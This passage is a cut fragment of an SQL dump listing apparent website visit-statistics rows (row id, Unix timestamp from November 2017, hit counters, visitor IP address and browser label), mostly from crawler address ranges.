82439,1511845418,1,1,0,0,'217.182.132.147','other'),(182440,1511845464,1,1,0,0,'217.182.132.80','other'),(182441,1511845808,1,1,0,0,'51.255.65.39','other'),(182442,1511845911,1,1,0,0,'66.249.64.28','chrome'),(182443,1511845937,1,1,0,0,'137.74.207.109','other'),(182444,1511845940,1,1,0,0,'66.249.70.27','chrome'),(182445,1511846051,1,1,0,0,'217.182.132.6','other'),(182446,1511846196,1,1,0,0,'51.255.65.33','other'),(182447,1511846202,24,24,0,0,'142.4.200.37','other'),(182448,1511846211,2,2,0,0,'178.154.171.88','other'),(182449,1511846223,1,1,0,0,'217.182.132.97','other'),(182450,1511846330,1,1,0,0,'87.250.224.46','other'),(182451,1511846499,1,1,0,0,'217.182.132.240','other'),(182452,1511847123,1,1,0,0,'66.249.70.27','chrome'),(182453,1511847550,1,1,0,0,'37.9.113.182','other'),(182454,1511847647,1,1,0,0,'51.255.65.61','other'),(182455,1511847803,1,1,0,0,'51.255.65.35','other'),(182456,1511847816,1,1,0,0,'51.255.71.126','other'),(182457,1511847826,1,1,0,0,'141.8.142.74','other'),(182458,1511848918,1,1,0,0,'51.255.65.32','other'),(182459,1511849110,1,1,0,0,'51.255.65.70','other'),(182460,1511849273,1,1,0,0,'217.182.132.94','other'),(182461,1511849646,1,1,0,0,'51.255.65.14','other'),(182462,1511849897,1,1,0,0,'217.182.132.97','other'),(182463,1511850111,1,1,0,0,'8.29.198.25','other'),(182464,1511850134,1,1,0,0,'51.255.71.112','other'),(182465,1511850293,1,1,0,0,'180.76.15.153','other'),(182466,1511850547,1,1,0,0,'216.244.66.237','other'),(182467,1511850575,1,1,0,0,'130.180.220.35','chrome'),(182468,1511850635,1,1,0,0,'91.196.178.70','firefox'),(182469,1511850807,1,1,0,0,'207.46.13.143','other'),(182470,1511851302,3,3,0,0,'141.8.142.74','other'),(182471,1511851617,1,0,1,0,'66.249.70.29',''),(182472,1511851811,1,1,0,0,'66.249.64.29','chrome'),(182473,1511851818,2,1,1,0,'66.249.70.29',''),(182474,1511852036,1,1,0,0,'51.255.65.87','other'),(182475,1511852619,1,1,0,0,'95.135.18.30','chrome'),(182476,1511852675,1,1,0,0,'217.182.132.27','other'),(182477,1511852682,1,1,0,0,'217.182.132.150','other'),(182478,1511852797,1,1,0,0,'35.184.189.105','other'),(182479,1511852802,1,1,0,0,'51.255.65.34','other'),(182480,1511853275,1,1,0,0,'217.182.132.155','other'),(182481,1511853340,1,1,0,0,'217.182.132.37','other'),(182482,1511853452,1,1,0,0,'216.244.66.237','other'),(182483,1511853599,1,1,0,0,'217.182.132.78','other'),(182484,1511854136,1,1,0,0,'51.255.71.100','other'),(182485,1511854165,1,1,0,0,'91.196.178.71','chrome'),(182486,1511854311,1,1,0,0,'46.200.112.105','firefox'),(182487,1511854406,1,1,0,0,'137.74.207.116','other'),(182488,1511855817,1,0,1,0,'66.249.64.29',''),(182489,1511855993,64,64,0,0,'64.120.56.210','other'),(182490,1511856062,1,1,0,0,'95.132.43.128','firefox'),(182491,1511856077,1,1,0,0,'178.94.37.235','firefox'),(182492,1511856103,2,2,0,0,'141.8.142.74','other'),(182493,1511856105,1,1,0,0,'91.196.178.71','chrome'),(182494,1511856360,1,1,0,0,'164.132.162.155','other'),(182495,1511856786,1,0,1,0,'66.249.64.30',''),(182496,1511857008,1,1,0,0,'66.249.64.28','chrome'),(182497,1511857023,1,1,0,0,'66.249.70.27','chrome'),(182498,1511857176,1,1,0,0,'95.132.43.128','firefox'),(182499,1511857261,1,1,0,0,'217.182.132.20','other'),(182500,1511857290,1,1,0,0,'217.182.132.92','other'),(182501,1511857361,1,1,0,0,'217.182.132.66','other'),(182502,1511857401,2,2,0,0,'216.244.66.237','other'),(182503,1511857735,1,1,0,0,'195.211.175.39','chrome'),(182504,1511857762,1,1,0,0,'51.255.65.44','other'),(182505,1511857904,1,1,0,0,'51.255.71.128','other'),(182506,1511857961,1,1,0,0,'217.182.132.185','other'),(182507,1511858228,1,1,0,0,'51.255.65.43','other'),(182508,1511858327,1,1,0,0,'141.8.142.74','other'),(182509,1511858433,1,1,0,0,'94.179.41.30','chrome'),(182510,1511859009,1,1,0,0,'195.211.175.39','chrome'),(182511,1511859060,1,1,0,0,'51.255.65.69','other'),(182512,1511859368,1,1,0,0,'51.255.65.34','other'),(182513,1511859408,1,1,0,0,'94.254.247.180','chrome'),(182514,1511859452,1,1,0,0,'141.8.142.74','other'),(182515,1511859535,1,1,0,0,'51.255.65.38','other'),(182516,1511859649,1,1,0,0,'51.255.65.29','other'),(182517,1511859749,1,1,0,0,'137.74.207.114','other'),(182518,1511859770,1,1,0,0,'51.255.65.86','other'),(182519,1511860065,1,1,0,0,'51.255.65.83','other'),(182520,1511860124,1,1,0,0,'51.255.65.28','other'),(182521,1511860161,1,1,0,0,'217.182.132.180','other'),(182522,1511860215,1,1,0,0,'217.182.132.66','other'),(182523,1511860580,1,1,0,0,'40.77.167.124','other'),(182524,1511860765,1,1,0,0,'91.196.178.68','firefox'),(182525,1511860945,1,1,0,0,'51.255.64.106','other'),(182526,1511860966,1,1,0,0,'8.29.198.27','other'),(182527,1511861022,1,1,0,0,'141.8.142.74','other'),(182528,1511861452,2,2,0,0,'178.95.66.35','chrome'),(182529,1511861465,1,1,0,0,'51.255.65.25','other'),(182530,1511861627,1,1,0,0,'51.255.65.77','other'),(182531,1511861940,1,1,0,0,'178.154.171.88','other'),(182532,1511862211,1,1,0,0,'91.196.177.46','chrome'),(182533,1511862252,1,1,0,0,'37.55.151.244','firefox'),(182534,1511862263,2,0,2,0,'66.249.70.25',''),(182535,1511862429,1,1,0,0,'66.249.64.28','chrome'),(182536,1511862463,1,1,0,0,'66.249.70.27','chrome'),(182537,1511862729,1,1,0,0,'51.255.71.127','other'),(182538,1511862763,2,2,0,0,'141.8.142.74','other'),(182539,1511863178,1,1,0,0,'91.196.178.133','chrome'),(182540,1511863851,2,2,0,0,'141.8.142.74','other'),(182541,1511863923,1,1,0,0,'91.196.178.71','chrome'),(182542,1511864089,1,1,0,0,'217.182.132.181','other'),(182543,1511864102,1,1,0,0,'51.255.71.118','other'),(182544,1511864613,1,1,0,0,'217.182.132.6','other'),(182545,1511864797,1,1,0,0,'217.182.132.33','other'),(182546,1511864893,1,1,0,0,'51.255.65.12','other'),(182547,1511864993,1,1,0,0,'178.154.171.88','other'),(182548,1511865387,1,1,0,0,'217.182.132.82','other'),(182549,1511865610,2,2,0,0,'87.250.224.46','other'),(182550,1511866056,2,2,0,0,'207.46.13.143','other'),(182551,1511866303,1,1,0,0,'188.163.16.6','chrome'),(182552,1511866313,4,4,0,0,'141.8.142.74','other'),(182553,1511866460,1,1,0,0,'51.255.71.133','other'),(182554,1511866498,1,1,0,0,'178.154.171.88','other'),(182555,1511867014,3,3,0,0,'35.184.189.105','other'),(182556,1511867173,1,0,1,0,'66.249.70.25',''),(182557,1511867641,1,1,0,0,'91.196.178.68','chrome'),(182558,1511867704,1,1,0,0,'217.182.132.182','other'),(182559,1511867811,1,1,0,0,'66.249.64.29','chrome'),(182560,1511867825,1,1,0,0,'66.249.70.29','chrome'),(182561,1511867880,1,1,0,0,'193.227.119.23','firefox'),(182562,1511867962,1,0,1,0,'66.249.64.16',''),(182563,1511867997,1,1,0,0,'141.8.142.74','other'),(182564,1511868245,1,1,0,0,'164.132.162.188','other'),(182565,1511868436,1,1,0,0,'51.255.65.39','other'),(182566,1511868525,1,1,0,0,'51.255.65.74','other'),(182567,1511868554,1,1,0,0,'207.46.13.114','other'),(182568,1511868789,1,1,0,0,'164.132.162.158','other'),(182569,1511868878,1,1,0,0,'217.182.132.240','other'),(182570,1511869082,1,1,0,0,'51.255.65.18','other'),(182571,1511869213,1,1,0,0,'51.255.65.65','other'),(182572,1511869276,1,1,0,0,'217.182.132.172','other'),(182573,1511869283,1,1,0,0,'216.244.66.237','other'),(182574,1511869780,1,1,0,0,'91.196.178.168','chrome'),(182575,1511869824,1,1,0,0,'51.255.65.36','other'),(182576,1511870014,1,1,0,0,'217.182.132.93','other'),(182577,1511870085,2,2,0,0,'141.8.142.74','other'),(182578,1511870311,1,1,0,0,'51.255.65.92','other'),(182579,1511870618,2,2,0,0,'216.244.66.237','other'),(182580,1511871240,1,1,0,0,'164.132.162.158','other'),(182581,1511871604,1,1,0,0,'217.182.132.57','other'),(182582,1511871805,1,1,0,0,'8.29.198.27','other'),(182583,1511871838,2,2,0,0,'141.8.142.74','other'),(182584,1511871917,1,1,0,0,'178.154.171.88','other'),(182585,1511872110,1,1,0,0,'78.111.190.203','chrome'),(182586,1511872282,1,1,0,0,'217.182.132.20','other'),(182587,1511872314,2,2,0,0,'5.9.63.162','other'),(182588,1511872801,1,1,0,0,'157.55.39.120','other'),(182589,1511873152,2,2,0,0,'141.8.142.74','other'),(182590,1511873197,1,1,0,0,'51.255.65.61','other'),(182591,1511873422,1,1,0,0,'51.255.65.21','other'),(182592,1511873776,1,1,0,0,'178.154.171.88','other'),(182593,1511874534,1,1,0,0,'216.244.66.237','other'),(182594,1511874956,1,1,0,0,'95.132.43.229','firefox'),(182595,1511875025,1,1,0,0,'178.154.171.88','other'),(182596,1511875311,1,1,0,0,'91.196.178.71','chrome'),(182597,1511876105,1,1,0,0,'207.46.13.143','other'),(182598,1511876243,1,1,0,0,'40.77.167.124','other'),(182599,1511876252,1,1,0,0,'141.8.142.74','other'),(182600,1511876437,1,0,1,0,'66.249.70.29',''),(182601,1511876825,1,1,0,0,'91.196.177.46','chrome'),(182602,1511876899,1,1,0,0,'91.196.178.68','chrome'),(182603,1511877255,1,1,0,0,'217.182.132.52','other'),(182604,1511877664,2,2,0,0,'51.255.71.98','other'),(182605,1511878032,1,1,0,0,'217.182.132.17','other'),(182606,1511878873,1,1,0,0,'199.58.86.209','other'),(182607,1511879053,1,1,0,0,'217.182.132.151','other'),(182608,1511879807,2,2,0,0,'35.184.189.105','other'),(182609,1511880144,1,1,0,0,'82.207.118.245','firefox'),(182610,1511880417,1,1,0,0,'216.244.66.237','other'),(182611,1511880427,1,1,0,0,'51.255.65.73','other'),(182612,1511880608,1,1,0,0,'51.255.71.120','other'),(182613,1511880793,1,1,0,0,'31.43.10.11','chrome'),(182614,1511880800,1,1,0,0,'51.255.65.44','other'),(182615,1511881296,1,1,0,0,'51.255.71.100','other'),(182616,1511881474,1,1,0,0,'51.255.71.110','other'),(182617,1511881789,2,2,0,0,'141.8.142.74','other'),(182618,1511881968,1,1,0,0,'216.244.66.237','other'),(182619,1511882052,1,1,0,0,'207.46.13.114','other'),(182620,1511882659,1,1,0,0,'8.29.198.26','other'),(182621,1511882980,1,1,0,0,'217.182.132.91','other'),(182622,1511883083,1,1,0,0,'51.255.65.55','other'),(182623,1511883356,2,2,0,0,'91.196.178.167','chrome'),(182624,1511883460,1,1,0,0,'217.182.132.74','other'),(182625,1511883822,1,1,0,0,'217.182.132.90','other'),(182626,1511884160,1,1,0,0,'141.8.142.74','other'),(182627,1511884412,1,0,1,0,'66.249.64.219',''),(182628,1511884544,1,1,0,0,'51.255.65.95','other'),(182629,1511884808,1,1,0,0,'216.244.66.237','other'),(182630,1511884961,1,1,0,0,'217.182.132.171','other'),(182631,1511885207,1,1,0,0,'51.255.65.50','other'),(182632,1511886425,1,1,0,0,'51.255.65.96','other'),(182633,1511886458,1,1,0,0,'217.182.132.147','other'),(182634,1511886800,1,1,0,0,'51.255.65.82','other'),(182635,1511886920,1,1,0,0,'91.196.178.72','chrome'),(182636,1511887170,1,1,0,0,'217.182.132.170','other'),(182637,1511887848,1,1,0,0,'51.255.65.27','other'),(182638,1511888407,1,1,0,0,'51.255.65.29','other'),(182639,1511889205,1,1,0,0,'216.244.66.237','other'),(182640,1511889734,1,1,0,0,'217.182.132.187','other'),(182641,1511889745,1,1,0,0,'217.182.132.179','other'),(182642,1511890133,1,1,0,0,'91.196.178.71','firefox'),(182643,1511890728,1,1,0,0,'180.76.15.146','other'),(182644,1511891313,1,1,0,0,'217.182.132.4','other'),(182645,1511891436,1,1,0,0,'137.74.203.194','other'),(182646,1511891682,1,1,0,0,'188.166.94.110','chrome'),(182647,1511892030,1,1,0,0,'217.182.132.64','other'),(182648,1511892298,1,1,0,0,'216.244.66.237','other'),(182649,1511892358,1,1,0,0,'164.132.162.188','other'),(182650,1511892730,1,1,0,0,'51.255.65.53','other'),(182651,1511892917,1,1,0,0,'91.196.178.5','chrome'),(182652,1511893257,1,1,0,0,'51.255.65.93','other'),(182653,1511893502,1,1,0,0,'8.29.198.27','other'),(182654,1511893611,2,2,0,0,'216.244.66.237','other'),(182655,1511894179,1,0,1,0,'68.180.228.94',''),(182656,1511894301,1,1,0,0,'51.255.65.24','other'),(182657,1511894467,1,1,0,0,'51.255.65.32','other'),(182658,1511894835,1,1,0,0,'51.255.71.131','other'),(182659,1511895349,1,1,0,0,'137.74.207.120','other'),(182660,1511895826,1,1,0,0,'46.200.103.148','chrome'),(182661,1511896520,1,1,0,0,'217.182.132.87','other'),(182662,1511896524,1,1,0,0,'216.244.66.237','other'),(182663,1511896823,1,1,0,0,'51.255.65.91','other'),(182664,1511897212,1,1,0,0,'51.255.65.89','other'),(182665,1511897664,1,1,0,0,'51.255.65.36','other'),(182666,1511897961,1,1,0,0,'216.244.66.237','other'),(182667,1511898161,1,1,0,0,'51.255.65.24','other'),(182668,1511898986,1,1,0,0,'217.182.132.60','other'),(182669,1511899162,1,1,0,0,'159.224.109.252','chrome'),(182670,1511899342,1,1,0,0,'141.8.132.22','other'),(182671,1511899596,1,1,0,0,'51.255.65.82','other'),(182672,1511899965,1,1,0,0,'51.255.71.120','other'),(182673,1511900256,1,1,0,0,'207.46.13.114','other'),(182674,1511900796,1,1,0,0,'51.255.71.110','other'),(182675,1511900868,1,1,0,0,'164.132.162.160','other'),(182676,1511900948,1,1,0,0,'217.182.132.152','other'),(182677,1511901065,1,1,0,0,'217.182.132.34','other'),(182678,1511901173,1,1,0,0,'51.255.71.128','other'),(182679,1511901345,1,1,0,0,'51.255.65.19','other'),(182680,1511901903,1,1,0,0,'51.255.65.31','other'),(182681,1511902255,1,1,0,0,'137.74.207.102','other'),(182682,1511903284,1,1,0,0,'51.255.71.123','other'),(182683,1511904344,1,1,0,0,'8.29.198.27','other'),(182684,1511904432,1,1,0,0,'217.182.132.90','other'),(182685,1511905073,1,1,0,0,'106.120.173.64','other'),(182686,1511905783,1,1,0,0,'51.255.65.56','other'),(182687,1511906338,1,1,0,0,'137.74.207.108','other'),(182688,1511906709,1,1,0,0,'37.145.10.63','msie'),(182689,1511907148,1,1,0,0,'178.154.171.88','other'),(182690,1511907171,1,1,0,0,'37.54.22.242','chrome'),(182691,1511907276,1,1,0,0,'51.255.65.19','other'),(182692,1511907900,1,1,0,0,'216.244.66.237','other'),(182693,1511908021,1,1,0,0,'51.255.65.92','other'),(182694,1511908136,1,1,0,0,'51.255.65.31','other'),(182695,1511908406,1,1,0,0,'176.31.231.10','other'),(182696,1511908537,1,1,0,0,'217.182.132.21','other'),(182697,1511909134,1,1,0,0,'51.255.65.79','other'),(182698,1511909220,1,1,0,0,'217.182.132.36','other'),(182699,1511912198,1,1,0,0,'178.154.171.88','other'),(182700,1511912597,1,1,0,0,'180.76.15.23','other'),(182701,1511913085,1,0,1,0,'66.249.64.131',''),(182702,1511913371,1,1,0,0,'217.182.132.16','other'),(182703,1511913613,1,1,0,0,'217.182.132.14','other'),(182704,1511913730,1,1,0,0,'137.74.207.120','other'),(182705,1511913790,1,1,0,0,'51.255.71.101','other'),(182706,1511914126,1,1,0,0,'51.255.65.34','other'),(182707,1511914192,1,1,0,0,'51.255.65.80','other'),(182708,1511914212,1,1,0,0,'217.182.132.78','other'),(182709,1511914564,1,1,0,0,'217.182.132.240','other'),(182710,1511915179,1,1,0,0,'8.29.198.25','other'),(182711,1511915679,1,1,0,0,'217.182.132.85','other'),(182712,1511916154,1,1,0,0,'217.182.132.181','other'),(182713,1511916708,1,1,0,0,'217.182.132.172','other'),(182714,1511917702,1,1,0,0,'51.255.71.115','other'),(182715,1511918488,1,1,0,0,'51.255.65.16','other'),(182716,1511918709,1,1,0,0,'217.182.132.37','other'),(182717,1511918818,1,1,0,0,'137.74.207.109','other'),(182718,1511919664,1,1,0,0,'51.255.65.71','other'),(182719,1511919720,1,1,0,0,'217.182.132.87','other'),(182720,1511919811,1,1,0,0,'85.195.116.66','chrome'),(182721,1511920195,1,1,0,0,'178.154.171.24','other'),(182722,1511920457,1,1,0,0,'51.255.65.89','other'),(182723,1511920493,1,1,0,0,'216.244.66.237','other'),(182724,1511920659,1,1,0,0,'51.255.65.90','other'),(182725,1511920796,1,1,0,0,'164.132.162.159','other'),(182726,1511921172,1,1,0,0,'51.255.65.73','other'),(182727,1511921691,1,1,0,0,'37.9.113.101','other'),(182728,1511921914,1,1,0,0,'217.182.132.73','other'),(182729,1511921964,1,1,0,0,'216.244.66.237','other'),(182730,1511921969,1,0,1,0,'66.249.70.29',''),(182731,1511921976,1,1,0,0,'217.182.132.177','other'),(182732,1511922239,1,1,0,0,'217.182.132.57','other'),(182733,1511922490,1,1,0,0,'164.132.162.155','other'),(182734,1511922615,1,1,0,0,'217.182.132.77','other'),(182735,1511922650,1,1,0,0,'51.255.65.224','other'),(182736,1511923176,1,1,0,0,'5.45.207.30','other'),(182737,1511923413,1,1,0,0,'216.244.66.237','other'),(182738,1511924252,1,1,0,0,'217.182.132.193','other'),(182739,1511924476,1,1,0,0,'217.182.132.37','other'),(182740,1511925214,1,1,0,0,'51.255.71.120','other'),(182741,1511925500,1,1,0,0,'51.255.65.94','other'),(182742,1511925939,1,1,0,0,'164.132.162.154','other'),(182743,1511926016,1,1,0,0,'8.29.198.25','other'),(182744,1511926421,1,1,0,0,'51.255.71.98','other'),(182745,1511926517,1,1,0,0,'217.182.132.4','other'),(182746,1511926927,1,1,0,0,'51.255.65.47','other'),(182747,1511927497,1,1,0,0,'52.53.129.36','chrome'),(182748,1511927594,1,1,0,0,'91.209.11.236','other'),(182749,1511928225,1,1,0,0,'217.182.132.150','other'),(182750,1511928910,1,1,0,0,'216.244.66.237','other'),(182751,1511928960,1,1,0,0,'137.74.201.100','other'),(182752,1511929106,1,1,0,0,'51.255.71.98','other'),(182753,1511929455,1,1,0,0,'157.55.39.120','other'),(182754,1511929886,1,0,1,0,'66.249.70.25',''),(182755,1511930114,1,1,0,0,'217.182.132.174','other'),(182756,1511930183,1,1,0,0,'51.255.65.66','other'),(182757,1511930196,1,1,0,0,'51.255.71.117','other'),(182758,1511930368,1,1,0,0,'109.254.251.9','other'),(182759,1511930442,1,1,0,0,'217.182.132.20','other'),(182760,1511930793,1,1,0,0,'217.182.132.16','other'),(182761,1511930845,1,1,0,0,'51.255.65.73','other'),(182762,1511931129,1,1,0,0,'217.182.132.156','other'),(182764,1511931647,1,1,0,0,'216.244.66.237','other'),(182765,1511932141,1,1,0,0,'217.182.132.60','other'),(182766,1511932221,1,1,0,0,'193.227.119.22','opera'),(182767,1511932329,1,1,0,0,'137.74.207.170','other'),(182768,1511932647,1,1,0,0,'213.180.203.40','other'),(182769,1511932706,1,1,0,0,'51.255.65.27','other'),(182770,1511932731,2,2,0,0,'54.165.59.7','other'),(182771,1511932811,1,1,0,0,'217.182.132.78','other'),(182772,1511932941,1,1,0,0,'51.255.65.15','other'),(182773,1511933081,1,1,0,0,'216.244.66.237','other'),(182774,1511933082,1,1,0,0,'51.255.65.63','other'),(182775,1511933207,1,1,0,0,'217.182.132.176','other'),(182776,1511933297,1,1,0,0,'51.255.65.16','other'),(182777,1511933796,1,1,0,0,'51.255.71.119','other'),(182778,1511934039,1,1,0,0,'54.165.59.7','other'),(182779,1511934064,1,1,0,0,'51.255.65.56','other'),(182780,1511934229,1,1,0,0,'217.182.132.76','other'),(182781,1511934416,1,1,0,0,'217.182.132.75','other'),(182782,1511934778,1,1,0,0,'51.255.71.121','other'),(182783,1511935068,1,1,0,0,'137.74.207.120','other'),(182784,1511935607,1,1,0,0,'91.196.178.67','firefox'),(182785,1511935716,1,1,0,0,'51.255.65.24','other'),(182786,1511936193,1,1,0,0,'217.182.132.75','other'),(182787,1511936238,1,1,0,0,'180.76.15.155','other'),(182788,1511936461,1,0,1,0,'66.249.70.29',''),(182789,1511936846,1,1,0,0,'8.29.198.25','other'),(182790,1511937075,1,1,0,0,'216.244.66.237','other'),(182791,1511937126,1,1,0,0,'198.37.118.36','firefox'),(182792,1511937657,1,1,0,0,'40.77.167.124','other'),(182793,1511937859,1,1,0,0,'91.196.178.167','chrome'),(182794,1511937873,1,1,0,0,'91.209.11.236','other'),(182795,1511938080,1,1,0,0,'217.182.132.92','other'),(182796,1511938978,1,1,0,0,'217.182.132.69','other'),(182797,1511939021,1,1,0,0,'217.182.132.170','other'),(182798,1511939231,1,1,0,0,'91.196.178.69','chrome'),(182799,1511939483,1,1,0,0,'51.255.65.21','other'),(182800,1511939794,1,1,0,0,'217.182.132.84','other'),(182801,1511940032,1,1,0,0,'217.182.132.70','other'),(182802,1511940194,1,1,0,0,'137.74.207.164','other'),(182803,1511940463,1,1,0,0,'217.182.132.151','other'),(182804,1511940983,1,1,0,0,'51.255.65.89','other'),(182805,1511941203,1,1,0,0,'217.182.132.29','other'),(182806,1511941732,1,1,0,0,'195.238.108.89','chrome'),(182807,1511942391,1,1,0,0,'207.46.13.143','other'),(182808,1511942509,1,1,0,0,'91.196.178.101','firefox'),(182809,1511942539,1,1,0,0,'217.182.132.20','other'),(182810,1511942980,1,1,0,0,'51.255.65.84','other'),(182811,1511943119,1,1,0,0,'217.182.132.55','other'),(182812,1511943402,1,1,0,0,'51.255.65.77','other'),(182813,1511943482,1,1,0,0,'51.255.65.23','other'),(182814,1511944052,1,1,0,0,'51.255.65.56','other'),(182815,1511944086,1,1,0,0,'217.182.132.156','other'),(182816,1511944272,1,1,0,0,'217.182.132.4','other'),(182817,1511944310,1,1,0,0,'51.255.71.114','other'),(182818,1511944394,1,1,0,0,'217.182.132.75','other'),(182819,1511944496,1,1,0,0,'51.255.71.100','other'),(182820,1511944920,1,1,0,0,'217.182.132.149','other'),(182821,1511945430,2,2,0,0,'37.53.21.47','chrome'),(182822,1511945579,1,1,0,0,'216.244.66.237','other'),(182823,1511946016,1,1,0,0,'137.74.207.110','other'),(182824,1511946126,1,1,0,0,'91.196.178.166','chrome'),(182825,1511946206,1,1,0,0,'178.154.171.10','other'),(182826,1511946452,1,1,0,0,'37.9.113.60','other'),(182827,1511946503,1,1,0,0,'137.74.207.120','other'),(182828,1511946519,1,1,0,0,'51.255.71.120','other'),(182829,1511947082,1,1,0,0,'91.209.11.236','other'),(182830,1511947317,1,1,0,0,'217.182.132.63','other'),(182831,1511947677,1,1,0,0,'8.29.198.27','other'),(182832,1511947855,1,1,0,0,'37.9.113.63','other'),(182833,1511948305,1,1,0,0,'51.255.65.67','other'),(182834,1511948453,1,1,0,0,'198.37.118.36','firefox'),(182835,1511948845,1,1,0,0,'217.182.132.35','other'),(182836,1511948887,1,1,0,0,'51.255.65.81','other'),(182837,1511949212,1,1,0,0,'51.255.65.44','other'),(182838,1511949591,1,1,0,0,'217.182.132.155','other'),(182839,1511949953,1,1,0,0,'51.255.65.78','other'),(182840,1511949992,1,1,0,0,'51.255.65.69','other'),(182841,1511950151,1,1,0,0,'51.255.65.33','other'),(182842,1511950580,1,1,0,0,'82.207.113.129','chrome'),(182843,1511950713,1,1,0,0,'91.196.178.70','firefox'),(182844,1511951616,1,1,0,0,'217.182.132.31','other'),(182845,1511951929,1,1,0,0,'217.182.132.56','other'),(182846,1511952455,1,1,0,0,'51.255.71.127','other'),(182847,1511952507,1,1,0,0,'91.196.178.70','firefox'),(182848,1511952651,1,1,0,0,'37.52.16.125','firefox'),(182849,1511952813,1,0,1,0,'66.249.70.25',''),(182850,1511952994,1,0,1,0,'68.180.229.52',''),(182851,1511953003,1,1,0,0,'85.195.116.66','chrome'),(182852,1511953029,1,1,0,0,'51.255.65.84','other'),(182853,1511953097,1,1,0,0,'141.8.142.74','other'),(182854,1511953703,1,0,1,0,'66.249.64.30',''),(182855,1511953756,1,1,0,0,'217.182.132.77','other'),(182856,1511953959,1,1,0,0,'217.182.132.170','other'),(182857,1511954119,1,1,0,0,'85.195.116.66','chrome'),(182858,1511954121,1,1,0,0,'130.180.209.135','firefox'),(182859,1511954209,1,1,0,0,'217.182.132.151','other'),(182860,1511954503,1,1,0,0,'137.74.207.188','other'),(182861,1511954661,1,1,0,0,'40.77.167.124','other'),(182862,1511955261,1,1,0,0,'91.196.178.69','chrome'),(182863,1511955439,13,13,0,0,'173.234.153.122','other'),(182864,1511955986,1,1,0,0,'217.182.132.22','other'),(182865,1511956086,1,1,0,0,'217.182.132.150','other'),(182866,1511956267,14,14,0,0,'79.143.186.26','other'),(182867,1511957105,1,1,0,0,'217.182.132.60','other'),(182868,1511957310,1,1,0,0,'51.255.65.30','other'),(182869,1511957546,1,1,0,0,'217.182.132.80','other'),(182870,1511957803,1,1,0,0,'91.209.11.236','other'),(182871,1511958027,1,1,0,0,'207.46.13.143','other'),(182872,1511958524,1,1,0,0,'8.29.198.25','other'),(182873,1511958883,1,1,0,0,'128.72.151.219','msie'),(182874,1511959085,1,1,0,0,'37.54.29.162','chrome'),(182875,1511959765,1,1,0,0,'194.79.11.98','chrome'),(182876,1511959853,1,1,0,0,'51.255.65.77','other'),(182877,1511959857,1,1,0,0,'217.182.132.63','other'),(182878,1511959924,1,1,0,0,'51.255.65.24','other'),(182879,1511959975,1,1,0,0,'217.182.132.86','other'),(182880,1511960167,1,1,0,0,'164.132.162.156','other'),(182881,1511960296,1,1,0,0,'207.46.13.114','other'),(182882,1511960419,1,1,0,0,'164.132.162.157','other'),(182883,1511960685,1,1,0,0,'51.255.65.73','other'),(182884,1511961044,1,1,0,0,'164.132.162.164','other'),(182885,1511961323,1,1,0,0,'217.182.132.6','other'),(182886,1511961596,1,1,0,0,'216.244.66.237','other'),(182887,1511961698,1,1,0,0,'91.196.177.46','chrome'),(182888,1511961850,1,1,0,0,'51.255.71.112','other'),(182889,1511962449,1,1,0,0,'54.165.59.7','other'),(182890,1511962491,1,1,0,0,'91.196.178.70','chrome'),(182891,1511962611,1,1,0,0,'217.182.132.60','other'),(182892,1511962669,1,1,0,0,'164.132.162.153','other'),(182893,1511962785,1,1,0,0,'51.255.71.113','other'),(182894,1511962794,1,1,0,0,'51.255.71.132','other'),(182895,1511963164,1,1,0,0,'217.182.132.181','other'),(182896,1511963642,1,1,0,0,'137.74.207.159','other'),(182897,1511963748,1,1,0,0,'91.196.178.167','chrome'),(182898,1511963997,1,1,0,0,'178.92.211.55','chrome'),(182899,1511964133,1,1,0,0,'51.255.65.87','other'),(182900,1511964608,1,1,0,0,'54.165.59.7','other'),(182901,1511964730,1,1,0,0,'217.69.133.9','other'),(182902,1511964797,1,1,0,0,'217.69.134.178','other'),(182903,1511964836,1,1,0,0,'217.69.134.200','other'),(182904,1511966299,1,1,0,0,'194.1.193.143','opera'),(182905,1511966373,1,1,0,0,'217.182.132.183','other'),(182906,1511966631,1,1,0,0,'91.196.178.67','chrome'),(182907,1511966882,1,1,0,0,'216.244.66.237','other'),(182908,1511967517,1,1,0,0,'141.8.142.74','other'),(182909,1511967534,1,1,0,0,'217.182.132.66','other'),(182910,1511967804,1,1,0,0,'217.182.132.92','other'),(182911,1511968481,1,0,1,0,'66.249.70.27',''),(182912,1511968497,1,1,0,0,'51.255.71.98','other'),(182913,1511968693,1,0,1,0,'66.249.70.29',''),(182914,1511968829,1,0,1,0,'66.249.64.29',''),(182915,1511969360,1,1,0,0,'8.29.198.26','other'),(182916,1511970008,1,1,0,0,'164.132.162.154','other'),(182917,1511970406,1,1,0,0,'164.132.162.159','other'),(182918,1511970431,1,1,0,0,'18.221.74.81','other'),(182919,1511971256,1,1,0,0,'91.196.178.69','firefox'),(182920,1511971704,1,1,0,0,'217.182.132.55','other'),(182921,1511972225,1,1,0,0,'51.255.65.71','other'),(182922,1511972231,1,1,0,0,'51.255.65.91','other'),(182923,1511972654,1,1,0,0,'37.9.113.157','other'),(182924,1511972909,1,1,0,0,'91.196.178.167','chrome'),(182925,1511972912,1,1,0,0,'217.182.132.67','other'),(182926,1511973169,1,1,0,0,'91.209.11.236','other'),(182927,1511973281,1,1,0,0,'37.55.57.49','chrome'),(182928,1511973414,1,1,0,0,'217.182.132.154','other'),(182929,1511973996,1,1,0,0,'51.255.71.112','other'),(182930,1511974102,1,1,0,0,'217.182.132.191','other'),(182931,1511974726,1,1,0,0,'217.182.132.33','other'),(182932,1511974835,1,1,0,0,'51.255.65.92','other'),(182933,1511974967,1,1,0,0,'91.196.178.42','chrome'),(182934,1511974989,1,1,0,0,'51.255.65.74','other'),(182935,1511975033,1,1,0,0,'216.244.66.237','other'),(182936,1511975126,1,1,0,0,'164.132.162.188','other'),(182937,1511975226,1,1,0,0,'217.182.132.241','other'),(182938,1511975561,1,0,1,0,'66.249.64.29',''),(182939,1511975768,1,1,0,0,'40.77.167.124','other'),(182940,1511975983,1,1,0,0,'217.182.132.85','other'),(182941,1511976057,1,1,0,0,'51.255.65.68','other'),(182942,1511976314,1,0,1,0,'66.249.70.27',''),(182943,1511977147,1,1,0,0,'66.249.64.30','chrome'),(182944,1511977149,1,1,0,0,'66.249.70.27','chrome'),(182945,1511977436,1,1,0,0,'51.255.71.128','other'),(182946,1511977565,1,1,0,0,'216.244.66.237','other'),(182947,1511978494,1,1,0,0,'217.182.132.96','other'),(182948,1511978775,1,1,0,0,'51.255.65.46','other'),(182949,1511978812,1,1,0,0,'217.182.132.171','other'),(182950,1511978879,1,1,0,0,'51.255.65.71','other'),(182951,1511978904,1,1,0,0,'217.182.132.23','other'),(182952,1511979383,1,